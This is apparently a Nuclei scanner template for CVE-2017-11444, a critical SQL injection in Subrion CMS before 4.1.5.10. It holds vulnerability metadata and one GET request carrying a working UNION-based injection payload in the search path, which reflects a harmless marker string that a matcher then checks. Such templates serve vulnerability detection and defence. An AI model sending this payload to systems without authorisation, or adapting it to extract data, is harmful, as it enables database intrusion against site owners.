nuclei-templates/http/cves/2017/CVE-2017-11444.yaml

41 lines
1.3 KiB
YAML

id: CVE-2017-11444
info:
name: Subrion CMS <4.1.5.10 - SQL Injection
author: dwisiswant0
severity: critical
description: "Subrion CMS before 4.1.5.10 has a SQL injection vulnerability in /front/search.php via the $_GET array."
reference:
- https://github.com/intelliants/subrion/issues/479
- https://mp.weixin.qq.com/s/89mCnjUCvmptLsKaeVlC9Q
- https://nvd.nist.gov/vuln/detail/CVE-2017-11444
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2017-11444
cwe-id: CWE-89
epss-score: 0.04447
cpe: cpe:2.3:a:intelliants:subrion_cms:*:*:*:*:*:*:*:*
epss-percentile: 0.91351
metadata:
max-request: 1
vendor: intelliants
product: subrion_cms
tags: cve,cve2017,sqli,subrion
http:
- method: GET
path:
- "{{BaseURL}}/search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "projectdiscovery.io"
- type: status
status:
- 200